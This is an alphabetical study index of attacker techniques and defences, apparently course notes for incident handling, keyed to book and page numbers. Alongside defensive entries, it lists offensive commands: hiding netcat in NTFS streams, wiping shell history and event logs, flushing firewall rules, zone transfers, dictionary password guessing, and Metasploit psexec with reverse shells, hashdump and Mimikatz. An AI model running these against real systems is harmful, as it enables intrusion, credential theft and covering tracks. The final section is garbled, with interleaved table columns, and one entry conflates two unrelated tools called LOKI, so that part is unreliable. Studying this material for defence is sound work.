ActiveX (book 4, pp. 116, 147; book 5, p. 190): active browser content.
Add N Edit Cookies (book 4, p. 144): free Firefox plugin to modify cookies.
Address Resolution Protocol (ARP) (book 3, pp. 47-49, 51-52, 56, 84-85, 93): how it works; ARP cache poisoning; defenses. (book 6, p. 17): NO ARP cache poisoning! Could turn into a DoS.
addsyms: free code to re-add the system call table export if it has been removed, as it is in Red Hat 8 and later.
Adore (book 5, p. 65): kernel rootkit; listens on a port.
Advanced Intrusion Detection Environment (AIDE) (book 1, p. 258; book 5, p. 67): file integrity checker (similar to Tripwire).
Aggressive Mode (book 4, p. 26): VPNs and others use IKE to exchange new keys quickly across the network.
Airbase-NG (book 2, p. 68): started by Easy-Creds; creates an AP.
Aircrack-ng (book 2, p. 64): wireless sniffer for cracking WEP keys; need to sniff 50-1000 MB to succeed.
AirDefense (book 2, p. 75): identify war driving.
AirMagnet (book 2, p. 75): identify war driving.
Airopeek (Omnipeek) (book 2, p. 64): wireless-specific sniffer.
Alternate Data Streams in NTFS (book 5, p. 105): if the file is moved, the hidden file moves along with it; smbclient can get data from Windows ADS; dir /r.
Alternate Data Stream .exe example (book 5, p. 110): type c:\tools\nc.exe > c:\tmp\test.txt:nc.exe, start c:\tmp\test.txt (XP); use wmic.
Alternate Data Stream Notepad example (book 5, pp. 108-109): notepad c:\tmp\test.txt:hidden.txt
Alureon capabilities: creates an RC4-encrypted file system at the end of the HDD; config.ini, FileDownload, InjectorAdd.
Alureon/TDL rootkit family: kernel-mode; for hiding and dodging AV; alters Windows file system drivers: atapi.sys/iastor.sys.
Anti-reverse engineering for execs (Windows) (book 5, p. 19): pack the exe so that it runs, decompresses, and then you get the main executable.
AntiVirus (AV) (book 1, pp. 53, 119; book 4, p. 170; book 5, p. 9): prevent installation (DoS); can identify an app-level Trojan horse backdoor.
Apache (book 1, pp. 13, 256; book 4, pp. 110, 124): ModSecurity offers solid filtering features.
API Hooking (book 5, pp. 45, 48): change API calls for running processes to hide.
APPEVENT.EVTX (book 5, p. 114): one of the main event logs.
APPLICATION.LOG (book 5, p. 114): one of the primary temp event logs.
Application-level Trojan backdoors (book 5, pp. 9-16): client-server architecture; Poison Ivy, VNC, Dameware, Sub7, GhostRAT, Blackshades.
archive.org (book 2, p. 39): similar to Google; Wayback Machine.
Armitage (book 3, p. 113): Metasploit GUI interface.
arp -a / arp -a or -e (book 3, p. 85): show ARP entries in Windows / Linux.
ARP cache poisoning (book 4, p. 24): map IP (network layer) to MAC (data link layer).
ARP cache poisoning in session hijacking: ARP-spoof both sides (origin and destination), then hijack.
ARP inspection: prevents attackers from assuming IP addresses.
ARP lab (book 3, pp. 70-77).
Arpspoof (book 3, pp. 51-52): manipulates the IP-to-MAC mapping; feeds false ARP messages into the LAN; traffic is pointed to the attacker.
ARPWatch (book 3, p. 85): tool to check across the network for sniffing and session hijacking; monitors the LAN.
Buffer overflow exploit best practice (book 3, p. 107): make the exploit small enough to fit the buffer; avoid terminators like 0x00.
Buffer overflow vulnerable commands (book 3, p. 103): strcpy, strncpy, strcat, sprintf, scanf, fgets, gets, getws, memcpy, memmove.
Building a Team (book 1, p. 30).
Burp Proxy (book 4, p. 146): find and alter HTTP requests in real time.
Cain (book 4, pp. 10, 16-33, 24, 91, 93-95, 104): hash calculator, war driver, sniffer for passwords, Windows hash dumper, RSA token generator…; Cain has a GUI and is used to gather info about the system; Abel runs in the background and dumps info.
Cain defences (book 4, p. 31): Pre: remove LANMAN hashes from the local system; disable LANMAN challenge/response auth across the network (use NTLMv2); enforce strong passwords; use a password policy; implement SYSKEY; protect the SAM db.
Cain as password cracker (book 4, p. 25): cracks Microsoft LANMAN and NT hashes (stored in SAM and AD); LM challenge/response; NTLMv1&2 challenge/response; Kerberos5 auth (used for auth across the network).
Cain as password cracker 2 (book 4, p. 26): CISCO, APOP-MD5, RIPv2-MD5, OSPF-MD5, VRRP-HMAC-96, VNC 3DES, RADIUS, IKE pre-shared keys, Server 2k, MySQL 2k3.
CAM table (switches): records a station's MAC address and its corresponding switch port location; a timestamp for the entry is recorded, and its VLAN assignment.
canary (book 3, p. 124): hash of the return pointer to protect it; creates a hash of the return pointer and checks it after the function call; 3 types: random, terminator and XOR.
case insensitive - Windows (book 4, p. 178): tasklist | find /I /c "notepad.exe"
case insensitive - Linux (book 4, p. 184): ps aux | grep xeyes
cat (Linux) (book 1, p. 220): cat [OPTION] [FILE]... create single or multiple files; view the contents of a file; concatenate files; redirect output to the terminal or to files.
cat /etc/passwd (book 1, p. 220): see the contents of a file (Linux).
cat ~/test_file (book 1, p. 220): see the content of a file.
Cdoor - non-promiscuous sniffing backdoor: matches the pattern of packets to ports; if the packets hit the proper ports, temporarily listens on 5002 with a shell.
Cdoor - non-promiscuous sniffing backdoor (2): SYN packets to ports X, Y and Z; after Z, a temporary listener on 5002; connect with netcat.
Certificate Authority (CA) (book 3, pp. 60-61, 65, 84).
CGI how it works (same for PHP, ASP, JSP): the request to run the CGI is in the URL requested of the server; POST and GET.
CGI: program interface for executable programs with web pages.
CGI/web scanner def: same as vulnerability scanner def + chrooted environment (can only see part of file).
Chain of Custody (Identification) (book 1, p. 97): don't delete files till the case is closed; control access to evidence; law enforcement to sign for evidence.
Covert_TCP (book 5, pp. 127-131, 134): transmits info by entering ASCII in TCP/IP fields: IP ID, TCP initial sequence number & TCP ack sequence number.
Covert_TCP bounce mode: client (SYN with spoofed src IP of the receiver) -> bounce server (SYN-ACK/RESET) -> receiving server.
Covert_TCP modes: IP ID mode: drop ASCII in the IP ID field. Seq mode: drop ASCII in the ISN in the 3-way handshake.
Covert_TCP receiver: ./covert_tcp -dest -source -source_port -dest_port -server -file
CoWPAtty (book 2, p. 65): sniffs the 4-way handshake and launches a crypto attack against the PSK.
cp hackstuff.exe notepad.exe:stream1.exe (book 5, p. 104): to hide files in a stream behind normal files.
CpuHog (book 4, p. 154): sets its priority to 16 (highest); Windows sets all other apps to 15. Pre: patch the system. Ide: single process at 100%. Con: kill. Era: remove the program. Rec: reboot, msconfig.
crafted packet: can cause a DoS for a web server; formatted in a way not expected by the developer.
create non-root account (book 1, p. 222): useradd -d [Home_dir] [login] -> useradd -d /home/fred fred
CreateRemoteThread (book 5, p. 45): create a thread so the DLL can run: CreateRemoteThread; free up space.
crontab (book 1, p. 253; book 5, p. 44): #crontab -l -u root; look for cron jobs scheduled by root/UID 0. Altered to start malware at startup, hidden.
Cross-Site Scripting (XSS) (book 4, pp. 76, 110, 113-126, 128-141, 147, 150; book 6, p. 59 example): BeEF is an XSS framework and delivers a malicious payload; based on reflecting input back to the user; bounce code off the server back to the browser.
Cross-site scripting - admins attack (book 4, p. 119): the browser can be exploited while logs are viewed by the admin.
Cross-site scripting defenses: Ide, Con.. (book 4, p. 126): Ide: IDS logs, watch for coded info. Con: add a filter. Era: remove attack data. Rec: anti-fraud.
Cross-site scripting defenses: Pre (book 4, p. 124): same as SQL injection; filter user input and output HTML; allow only alphanumeric.
Cross-site scripting defenses: Pre 2 (book 4, p. 125): disable scripting (with impact); IE 8 and new Chrome have an XSS filter; Firefox NoScript.
Cross-site scripting how it works (book 4, pp. 116-117): find a vulnerable site, trick the user into clicking a link, code is transmitted to the vulnerable site, reflected & run in the browser.
Cross-site scripting how to launch (book 4, p. 114): URL embedded in email or on a third-party site, message boards.
Cross-site scripting internal system scanning (book 4, p. 119): scan the internal network from the browser; exploit the home router; Jikto.
Denial of Service (DoS) (book 4, pp. 73, 153-154, 163-171, 173, 175-176, 181, 183): bot functionality; DoS attacks and types.
Denial of Service (DoS) suites (book 4, p. 161): Targa, Xcrush, spike, Toast. Exploits: bonk, jolt, land, nestea, newtear, syndrop, teardrop.
df (book 1, p. 257): check available HDD space.
Dictionary attack (book 2, p. 64; book 4, pp. 10, 11, 27; book 6, p. 49): ASLEAP tool -> dictionary attack against LEAP authentication. Testing all words in a dictionary or a word file. C:\> enum -D -u [user] -f [wordfile] [target]
Dig (UNIX, instead of nslookup) (book 2, p. 26; book 6, pp. 29, 47): dig @[DNS_server_IP] [target_domain] -t AXFR; zone transfer attempt: #dig @10.10.10.45 target.tgt -t AXFR
dir: command to list file streams but not display or print their content.
Disable LANMAN authentication (book 4, p. 32): add the NoLMHash key to the registry; LMCompatibility reg value 3 or 5 (stop sending LANMAN challenge/response across the network).
Disaster Recovery (DR) (book 1, p. 10): part of the incident-handling plan.
Distributed Denial of Service (DDoS) (book 2, p. 14; book 4, pp. 154, 163): spread using worm techniques; DoS attacks and types; mostly launched by a botnet.
DLL injection (book 5, p. 45): allocate space: VirtualAllocEx; write name & code: WriteProcessMemory call; create a thread so the DLL can run: CreateRemoteThread; free up space: VirtualFreeEx function.
DLL injection and API hooking (book 5, p. 45): force the exe to accept a DLL. Hooking: the attacker undermines running processes interacting with Windows.
DMCA (Digital Millennium Copyright Act) (book 2, p. 9): copyright protection and prohibition against reverse engineering.
DNS amplification (book 4, pp. 156-159): send a small spoofed (60-byte) DNS query to many DNS servers; 512 bytes go to the victim. It is difficult to block the source because UDP is easy to spoof.
DNS cache poisoning defense 1: Pre: randomize source ports & query IDs; patch DNS servers and keep them up to date.
DNS cache poisoning defense 2: Pre: configure split DNS; internal DNS server for internal queries, external for external queries.
DNS cache poisoning defense 3: Pre: split-split DNS; outside machines resolve internal machines using the external-external DNS server.
DNS cache poisoning defense 4: Pre: use SSL (https), harden the OS, use a file integrity checker, IDS/IPS. Digitally sign DNS records soon!
DNS spoofing (book 3, pp. 57-60): remote possibility (between victim & DNS server); redirecting traffic; BETTERCAP; redirect graph.
DNS to hash lookup tool (ISC): send a DNS TXT record with the hash in it; the response carries file details. dig +short…."cmd.exe..
DNSCat (book 3, p. 11): Netcat functionality over DNS.
DNSCat2 (book 1, pp. 146, 148, 154 lab; book 5, p. 132): tool to use the DNS protocol for C2.
DNSSEC (book 3): digitally signed DNS records to prevent spoofing.
DNSStuff.com (book 2, p. 50): web-based recon/attack tool.
Domain name registration (book 2, p. 18): requires postal address, phone number, name of POC, authoritative DNS; useful for social engineering, war dialing, war driving, scanning.
DoS attack - types (book 4, p. 154): local (process kill, crash, CpuHog) and network (malformed packet & packet flood).
Drive duplication (book 1, p. 111): hardware tool for bit-by-bit copy.
Dshield sensor network (book 1, p. 15): 40k sensors globally, collecting info on scans & attacks against ports.
Dsniff (book 2, p. 6; book 3, pp. 63-64): injects packets to redirect traffic to it; active sniffer.
Dsniff components: dsniff, arpspoof, msgsnarf, dnsspoof, filesnarf, webmitm, macof, mailsnarf, sshmitm.
EASY-CREDS (book 2, pp. 67-68): allows the attacker to create an evil wireless AP over which he has full control; Aircrack-ng, dmesg holds DHCP logs, SSLStrip, Ettercap and URLSnarf for hijacking.
Ebowla (book 3, p. 146): environmentally keyed payloads + Golang language (hard for AV).
Editing accounting entries (book 5, p. 90): in utmp format; editing Unix tools: mary.c, cloak.c, remove, logwedit.c, wtmped.c, wzap.c.
Editing log files Unix (book 5, p. 85): /etc/syslog.conf (to see where logs are stored); /var/log/secure, messages, httpd logs.
Editing logs with physical access (book 5, p. 115): boot into another OS (Linux); a tool that can edit the SAM proves it's possible. No release yet.
Editing shell history (book 5, p. 87): the shell history is written on exit, therefore kill -9 [pid]; kill -9 bash; unset HISTFILE then kill -9 $$
editors (Linux) (book 1, p. 219): vi, gnu-emacs, pico, mcedit, nano, gedit; e.g. gedit test_file
Egg (book 3, p. 109): package containing the NOP sled, the attacker's machine code and the return pointer.
Elasticsearch Amazon: vulnerability allows you to do arbitrary reads of files; Linuxtime 2014/2015 exploited it.
Email threats/hate speech (book 1, p. 168): go through the email evidence only and let physical security/FBI handle the rest.
Emergency comm plan (book 1, p. 33): call list, conference bridge, IR contact cards, test your process.
EnCase (book 1, p. 41; book 3, p. 133): forensic software; has known parser flaws; attacks can execute commands or crash apps.
Enhanced Mitigation Experience Toolkit (EMET) (book 3, p. 122): helps address vulnerabilities in 3rd-party software (Microsoft).
Enum (book 2, p. 139; book 6, pp. 16, 33, 49): -S [targetIP]: pulls list of shares, -U: users, -G: groups, -P: password policy. Detecting users and groups, and password guessing (Windows).
enum -D -u [User] -f [wordfile] [TargetIP] (book 2): dictionary attack against a target; password guessing for an SMB session using a dictionary file.
enum -switch [TargetIP] (book 2, p. 139): switches: -S: pulls list of shares, -U: users, -G: groups, -P: password policy.
enum -u [UserName] -p [password] -G [TargetIP] (book 2, p. 139): provide an authenticated SMB session to extract info from the target.
!Exploitable (book 3, p. 104): tool released by Microsoft that estimates how exploitable a flaw is.
explorer.dll (rootkit hooking) (book 5, p. 48): the rootkit injects it into explorer.exe to do API hooking.
explorer.exe (book 3, p. 168; book 5, pp. 39, 46): target to migrate malicious processes into; process map; it's a common target of injection.
Extension Mechanisms for DNS (EDNS) amplification attacks (book 4, pp. 157, 159): locate DNS servers that do recursive lookups; they respond with a 4K-byte TXT record which is cached.
Extortion (book 2, p. 11): DoS extortion.
EyeWitness (book 2, p. 98): takes screenshots of websites, VNC, RDP servers and all detected web servers.
Fast flux (botnets) (book 4, pp. 69-71): the attacker swaps between different systems to evade detection.
Fast flux techniques (book 4, p. 69): adds an extra layer of obscurity; rapidly swapping resources among different systems to avoid takedown.
Fast flux techniques how it works: round-robin DNS records with a 3-10 min TTL populated with proxies; double flux. E.g. in phishing: spam bot emails the victim, the victim clicks on the link, round-robin DNS.
Fast spreading worms (book 4, p. 60): exponential; spread in the shape of a gold stick; Warhol: 99% in 15 mins; Flash: 30 seconds.
fg (book 1, pp. 227-228): bring a job to the foreground.
Fgdump (book 1, p. 57): system-level detection detects fgdump/netcat.
Finding hidden streams (book 5, p. 106): use third-party tools like LADS, streams, streams shell extension utility.
finding files (Linux) (book 1, p. 218): locate [prog_name]; updatedb (if not up to date); find / -name whoami
Format string example - Windows: sort "%d%d%s%s%n"; the sort command should crash.
Format string attacks defense: Pre: use format strings in all printf, sprintf, fprintf and snprintf function calls & patches.
Format string attacks defense 2: Ide: same as buffer overflow.
Format string attacks: misuse of printf, sprintf and snprintf; the attacker can read & overwrite info in memory.
Format string stack: input arguments are pushed on the stack in reverse order.
Format string stack view: example of adding a value (e.g. 5) to an address location, e.g. 0xbffffac0.
Fortify Source Code Analyzer (book 3, p. 127): commercial code-analysis tool.
Foundscan - McAfee's (book 2, p. 119): commercial vulnerability scanner.
Frag3: multiple parallel virtual defrag buffers.
Fraggle: relies on UDP packets to launch a flood against a target; Smurf does the same with ICMP.
Fragment overlap attack: the 2nd fragment lies about its offset in order to overlap and replace part of the first fragment.
Fragmentation problem for IDS: the IDS doesn't know how the fragments will be assembled; different OSs handle this differently.
FragRoute: similar to Fragrouter but flexible; includes a language for defining specific twisted fragmentation attacks. Diff: has the ability to route fragmented IP packets from a remote host (Fragrouter is a tool with multiple ways to fragment packets; sits on the same machine as the attacker; can't route).
Fyodor: nmap -n -sP -o Smurf.log '209.12.*.63,127,191,255'
Gcat (book 5, p. 133): C2 traffic over Gmail; bypasses DLP/IDS/IPS/firewalls.
General Electric Comprehensive Operating Supervisor (GECOS) (book 4, pp. 36, 38): general info about the account owner: name, phone number, address etc.
Generate new file (stego): the hidden message can generate a new file; used in CGIs; e.g. input text used to generate fractals.
Generic Routing Encapsulation (GRE) (book 4, p. 73): some bots can send IP packets via GRE tunnels to infected systems, to forward the packets as if they originated from the victim.
GET /./CGI-BIN/broken.chi HTTP/1.0: /./ directory insertion; a way Nikto avoids IDS.
Google Hacking Database (GHDB) (book 2, pp. 35, 41): index of search queries (we call them dorks) used to find publicly available information.
Google Maps API (book 2, p. 36): Maps is good for location images.
GrammaTech (book 3, p. 127): commercial code-analysis tool; C, C++.
Gratuitous ARPs (book 3, pp. 49, 84): sending ARP when no one asks; you can flood the switch / poison the ARP cache.
grep (book 1, pp. 239-241, 254, 264, 266; book 3, pp. 71-76; book 4, pp. 174, 183-188; book 5, pp. 72, 76-78, 95, 100, 141): finds items matching a given condition, e.g. cd /etc; grep root * (find root in all files); -i: case-insensitive search; -B n / -A n: n lines before and after; e.g. netstat -nap | grep 777, ps aux | grep bash; -c: count the number of lines of output: [cmd] | grep -i -c [text]; lsof -Pi | grep 8080
Group Policy Object (GPO) (book 4, p. 33): used to implement rules for users on the network.
GRR Rapid Response (book 1, p. 39): IR framework focused on remote live forensics; waits until the system is back online; couples with Rekall.
Hacktivism (book 2, p. 10): hacking to make a political point; website tampering, manipulating finance, remailers.
Hashcat (password cracker) (book 4, p. 10): fast password cracker; uses CUDA video drivers for faster password cracking.
hashdump and run hashdump (Meterpreter) (book 3, p. 162; book 6, p. 51): hashdump: dumps passwords from memory; run hashdump: dumps from the registry; Metasploit commands.
HBGary's fastdump (book 5, p. 22): memory dump tool.
HEADER: ../../cgi-bin/broker.cgi HTTP/1.0\r\n: a way Nikto avoids IDS; premature URL ending; include a reference to the CGI script in the header.
heartbeat (book 1, p. 151): interval at which a backdoor reconnects to get commands from the attacker.
Heartbleed (Powerbleed tool) (book 3, p. 65): malformed SSL heartbeat requests bleed memory out of an SSL-enabled Apache web server.
Hidden Unix files location (book 5, p. 83): /tmp, /dev, /etc, /usr/src, /usr/local/man.
Hidden Unix files location 2 (book 5, p. 82): name files starting with ". ", ".. ", "… ", " ".
Hiding components in Linux (book 5, p. 44): hide files, processes, network usage & events; ls, find, du, ps, top, killall; modify crontab.
Hiding files in NTFS Windows (book 5, p. 104): type hackstuff.exe > notepad.exe:stream1.exe; cp hackstuff.exe notepad.exe:stream1.exe
High Orbit Ion Cannon (HOIC) (book 4, p. 169): newer, by Anonymous; the JS can access more than one page; multithreaded; easy.
Hijacking + Responder (book 3, pp. 79-86, 88).
histogram: a chart showing the frequency of each letter used in a file; normal text is non-uniform; encrypted text has a flat histogram.
HKEY_CURRENT_USER (HKCU) (book 1, pp. 69, 85).
HKLM\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous: 0/1; null sessions have no special rights / are part of the Everyone group.
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM: 0/1; null sessions can/can't enumerate names.
Hop Limit (IPv6 header field) (book 2, pp. 81, 83): hop limit for IPv6 and TTL for IPv4.
Host Info (HINFO) (book 2, p. 25): generated when NSLOOKUP uses set type=any.
HTTP flood (book 4, p. 167): complete the 3-way handshake & send GET; send huge amounts of normal-looking traffic from bots.
Hunt teaming (book 3, p. 128): using pen test techniques to hunt an attacker that may have used the same method.
Human Interface Devices (HID) (book 2, p. 74; book 3, p. 5): screenshot example; similar to Rubber Ducky; USB sticks with auto-keyboards; download and run malware, steal…
Human Resources (book 1, p. 170): monitor a specific user only if a written request from HR is received.
Hybrid attacks (book 4, pp. 13, 27): "word mangling"; substitute characters in dictionary words, e.g. o=0, s=$, a=@.
Hydan (book 5, pp. 148, 150-153): hides data in Windows/Linux exes; the message is Blowfish-encrypted & put in the exe; no difference in size & function.
Hydan efficiency rate and detection: hides 1 out of 150 B; the distribution of the math functions is not altered, so it can be detected.
Hydan how it works: A+B = A-(-B); encrypts the message & hides it; uses polymorphic coding techniques to rebuild the exe.
Hydan in action: rebuilds the exe from the ground up, switching ADD and SUB; the result is the same size.
Hydan uses: hide data, watermark, sign exes, polymorphic signature evasion (not yet).
Hydan (book 6, p. 58): to hide and receive data; commands.
Hydra password guessing (book 4, p. 8): doesn't support full brute force; dictionary support; most protocols: rdp, smb, https, ssh.
ICMP (book 2, pp. 82, 83): echo request for a response to identify available targets; a time exceeded message comes back if the TTL is too small.
ICMP + tunnel (book 5, pp. 120, 124-125, 131): can carry shell traffic; ICMP messages can carry Covert_TCP.
ICMP timestamp (book 2, p. 82): used for network mapping via Nmap.
Identification (book 1, pp. 48-61): goal: gather events, analyze and determine if we have an incident.
Identification where it occurs (book 1, p. 53): network perimeter; host perimeter; system level; application level.
Insider threat (book 1, p. 174): a threat from an entity with access to your data; employees & business partners; well-intentioned/disgruntled/unnoticed employee.
Insider threat assessment checklist (book 1, p. 177): identify equipment, OS, IP, HTTP activity, IDS monitor, email monitor.
Insider threat assessment checklist (2) (book 1, p. 178): monitor called numbers, background check, work habits, after-hours visits.
Insider threat assessment checklist (3) (book 1, p. 179): review the data, summarize findings, interview the suspect.
Insider threats - types: casual & intentional (destructive/non-destructive).
InSSIDer (book 2, pp. 61-62, 77): used to discover SSIDs; doesn't help if cloaked; use Wellenreiter instead.
Instruction pointer (book 3, pp. 97-98, 104-105): the CPU uses the instruction pointer to point to the location in memory where the instruction is.
integrity-checking (book 5, pp. 67, 118, 155): Tripwire, OSSEC, AIDE.
Intellectual property (book 1, p. 181): the primary distinction between competitors, from brand to "secret formula".
IP address spoofing with sequence number guessing: DoS the original system so that it won't send RST; keep guessing the ISN; 1-way communication.
IP fragmentation analysis: frag 21223:1480@0+
IP fragmentation defense: Pre: reassemble before decision, FW, update IDS/IPS, HIPS/HIDS. Ide: IDS signature, IPS.
IP Identification field (book 5, p. 128): Covert_TCP can send info with ASCII data in the IP ID, TCP ISN & ack SN.
IP packet header (book 2, p. 81): IPv4 and IPv6 header.
IP Personality: tool that can make a Linux machine look like any other type of system.
iptables (book 1, p. 203; book 2, p. 151; book 3, p. 28; book 6, p. 8): iptables -F (disable firewall); sudo ifconfig eth0 10.10.75.1 netmask 255.255.0.0; ifconfig eth0 10.10.75.1/16; disable firewalls on Linux (+Windows).
Kansa (detection tool) (book 1, pp. 140-144): tool written in PowerShell; creates a stacked analysis of installed software in the environment (long tail); focus on interesting processes; uses PowerShell to pull info across many hosts and has good statistical tools.
Karmetasploit (book 2, pp. 69-71): listens for client probe requests, pretends to be the SSID, exploits with Metasploit; fake services: DHCP, DNS, POP3, web server; pretends to be an SMB server & gets your password.
Kernel (book 5, p. 51): rings 0 & 3 in x86 architecture; user process -> system library -> CPU interrupt -> system call table -> kernel code.
Kernel file on hard drive modification (book 5, p. 57): overwrite the kernel file: vmlinuz, and Win32.sys & ntoskrnl.exe (Windows); bypass ntldr.
Kernel loadable modules & device drivers (book 5, p. 55): used in Linux to add new HW/features; in Windows = drivers; create a malicious driver.
Kernel-mode rootkit (book 1, p. 258; book 5, pp. 7, 50, 52-56, 58, 60-61, 64-65, 67-69, 82): chkrootkit looks for anomalies on the system made by user/kernel m
Kernel mode rootkit defenses (book 5, p. 64): config lockdown: prevent getting root, harden the system, use a good security template; Pre: config lockdown, protect the syscall table.
Kernel mode rootkit defenses 2: protect the syscall table: use systrace (tracks system calls), HIPS; a few versions don't let the system call table be exported.
link:www.[target_company].com (book 2, pp. 29, 37): search on Google for all sites that link to the target.
Linux file system structure (book 1, p. 213): root, bin, sbin, dev, etc (passwd, shadow), home, lib, mnt, proc, tmp, usr (bin, sbin, man), var.
Linux password cracking defense (book 4, p. 40): password policy, guard the password file, strong passwords, use shadow passwords, use PAM, tokens, Kerberos.
Linux password file format (book 4, p. 36): colon-separated (login name, encrypted password, UID number, GID, GECOS info, home, shell).
Linux password shadow file format (book 4, p. 37): login name, encrypted password, date of last change, min age, max age, warning days…
LOKI: symmetric-key encryption block cipher, made to replace DES. Telnet over ICMP; can hide as DNS traffic using UDP port 53; carries a shell between Linux client and server using ICMP echo and reply.
Log editing in Windows (book 5, p. 114): main event log files: System, Security, App.
long-tail analysis (Kansa) (book 1, p. 140): create a stacked analysis of installed software in the environment.
Low Orbit Ion Cannon (LOIC) (book 4, pp. 168-169): tool to launch various floods; Windows, Linux, Android, JavaScript for the browser.
ls (book 1, pp. 148, 155, 215, 217, 221, 262; book 5, p. 44): -a (lists all files including hidden files); -d (lists all with */); -l (long listing format: permissions, links..); -r (lists in reverse order); -s (lists file size); -t (sorts list by time/date) -> e.g. -lrt, -la, ls /tmp, ls /dev | less, which ls, ls -a /tmp. A rootkit can hide files by changing ls.
LSASS (Local Security Authority Subsystem Service) (book 4, pp. 16, 49, 50, 51, 53, 59; book 5, p. 33): interface; manages local security, domain auth, AD processes.
lsof (list open files) (book 1, pp. 234, 247, 250, 252, 260, 262-263): -i (all network connections); -p [pid] (all files and ports used by a running process); +L1 (unlinked files); -P (shows ports, not names).
Man-in-the-Middle Framework (MitMf) (book 3, pp. 51, 53-54, 68, 83): supports ARP cache poisoning & multiple other injection/TCP stream modification attacks; backdoors EXEs in transit (FilePwn); ScreenShotter invokes HTML5 Canvas > screenshots the browser; SSLSTRIP+.
Management support (preparation) (book 1, p. 29): monthly report; show evidence of damage; show how others have been hacked.
Mantech Responder (book 5, p. 26): analyzes memory dumps; compares malware with known samples.
MasScan (book 2, p. 97): tool to scan very large networks with thousands of hosts, quickly.
Metasploit features/routines (book 3, p. 119): payloads, encoders/decoders, NOP sled, wrapper-shellcode creation, msfelfscan & msfpescan.
Metasploit launch and msfconsole (book 3, p. 153): cd /home…framework4.9.0; source /opt/useruby193.sh; ./msfconsole; show exploits; #ifconfig eth0 10.10.75.1/16; #msfconsole -q; show exploits
Metasploit multi/handler: waits for a connection: use exploit/multi/handler, set PAYLOAD.., set LHOST, exploit
Metasploit payloads (book 3, p. 115): payloads can be exported in different formats; e.g. of payloads: bind shell, reverse shell, VNC, inject DLL, create local admin user.
Metasploit payloads - Meterpreter (book 3, p. 116): 1. doesn't create a process to run the shell, runs it inside the exploited process; 2. doesn't touch the HDD, gives access by manipulating memory; 3. its own commands, no need for executables on the target; 4. dynamically loads new modules, changing its function while in the memory of the exploited process. Ability to load and interact with DLLs in real time after exploitation has occurred.
metasploit psexec (book 3, pp. 155, 156): use exploit/wind../smb/psexec; set PAYLOAD win../meterpreter/reverse_tcp
metasploit search: search type:exploit psexec; info exploit/windows/smb/psexec
Metasploit user interface (book 3, p. 113): select exploit, select target, select payload or set command to execute, set options & launch.
Meterpreter (book 5, p. 116): clearev clears the app, sec and sys event logs; no edit tool yet.
Meterpreter - get a shell (book 3, p. 163): run the "shell" command to get cmd; test using net user; exit.
Meterpreter features (book 3, pp. 103, 117): uses TLS to encrypt communication; displays system info; interacts with the file system, network and processes on the target.
Meterpreter session management (book 3, p. 159): background; sessions -l; sessions -i [session_nr]
Microsoft Sysinternals (book 1, pp. 77, 126): Process Monitor, psexec.
migrate (book 3, pp. 164, 167-169): migrate [Pid]; getpid; migrate [PIDofCalc.exe] (meterpreter)
Mimikatz (book 4, p. 51): extracts/views clear-text passwords from LSASS.
more: command to view the contents of a stream (location and name of the stream needed).
mount cdrom: cd /mnt/cdrom; mount cdrom; mount /dev/cdrom; mount /mnt/cdrom
MP3Stego (book 5, p. 148): hides data in .mpeg files.
MS-Kerberos5 Pre-Auth (book 4, p. 25): used for auth across the network.
Msfelfscan & Msfpescan (book 3, pp. 103, 119; book 5, p. 56): scan for exes and DLLs with vulnerable code (POP+POP+RETURN); can find libraries in unusual locations (service pack/language).
Msfvenom (book 3, pp. 137, 138).
Nikto IDS evasion - techniques (book 3): NULL method, session splicing (this is the L4 method).
Nikto password attack (book 2, p. 167): can launch a password guessing attack on the network; uses a dictionary file.
Nimda (book 1, p. 96; book 4, pp. 57-58): multi-exploit & multiplatform.
Nmap (book 1, pp. 54, 56, 121; book 5, pp. 80, 162, 164-168; book 6, pp. 16, 31-32, 48).
Nmap -A (book 2, p. 108): all details; pulls banner, OS identification, traceroute, etc.
nmap -n -sP -o Smurf.log '209.12.*.63,127,191,255': to look for potential Smurf amplifiers.
nmap - source ports for scanning: UDP 53, TCP 53 (DNS zone transfer), TCP 80 (most popular), TCP 443.
Nmap ACK scanning (book 2, p. 94): useful for mapping, not scanning; won't get past a stateful FW; can't tell if a port is open.
Nmap identifying addresses - sweeping (book 2, p. 82): sends 4 packets to addresses: ICMP echo, TCP SYN 443, TCP ACK 80, ICMP timestamp.
Nmap OS fingerprinting (book 2, p. 95): sending various packet types (e.g. SYN, FIN, URG, PUSH) and measuring the response.
Nmap OS fingerprinting 2nd gen (book 2, p. 96): new methods: sequence number GCD, window size, TCP timestamp, TTL guess, DF, congestion. If there is no recognized fingerprint, nmap gives instructions to send it to insecure.org.
nmap --reason (book 2, p. 107): gives the reason why it believes a port is open; e.g. nmap --reason 127.0.0.1
Nmap scan types (book 2, p. 93): ping sweep, ARP scan, connect scan, SYN, ACK, FIN, FTP proxy "bounce attack", idle, UDP, RPC.
Nmap traceroute capability: it "goes backwards"; sends a packet with the right protocol to the target, adjusts & determines the TTL, decrements the TTL.
PAM to enforce password Pluggeable authen module use in linux,can make users auth to
complexity policy in linux 4 41 RADIUS,kerberos..
Paros Web App Manipulation Proxy tool
Parser Problems - Buffer grabs data from ntwrk & parse to App.code parsing always
3 131
Overflow vuln.Eg.Wireshark,snort
Parser problems (file&protocol) 3 134 careful with sniffers(usually installed in DMZ,data centers etc)Patch!
Defense
steal hash,take adv of LM chal/resp or NTLMv1/2 across net and hash
Pass the hash Attack 4 49 gets passed
Pass the hash Attack 4 50 Steal hash, place in memory, use for SMB
Architechture
Pre:Patch,harden,endpoint sec,HIPS,SMB only via admin
Pass the hash Attack Defense 4 52 accs.Ide:config changes..
pshtoolkit,Windw credential editor(WCE);injects hash into LSASS,
Pass the hash Attack Tools 4 51 metasploit, psexec
Passive OS finger Printing Doesn't send pkts, rather just sniffs.eg surf the website & look at the header
Passive OS finger Printing Pre:close unused ports,stateful FW.Ide:not much cos its passive but u can use IDS sig
defences
2 73
get encrypted pass,get algorithm used,encrypt many dictionary pass
5-14, 22-24, 26- and compare
4 27, 31, 33, 40, audit,improve tech controls for pass complexity
password cracking 47, 49, 139 Pre:Disable LANMAN chal/resp; no LM hashes; policy (2 factor auth);
protect SAM,SYSKEY
5 170, 189
6 16
Password Cracking methods 4 10 Directory(word list),Brute force(iterating through caracter
sets),Hybrid(a mix of 2),Tools(Cain&Abel,John,Hashcat)
2 56 pretty slow.can trigger account lockout
3 157, 173 try small nr of pass on many acc's. avoid acc lockout
pasword guessing
4 4-8, 55 in windows:SAM database and AD.In linux: etc/shadow
6 16, 35
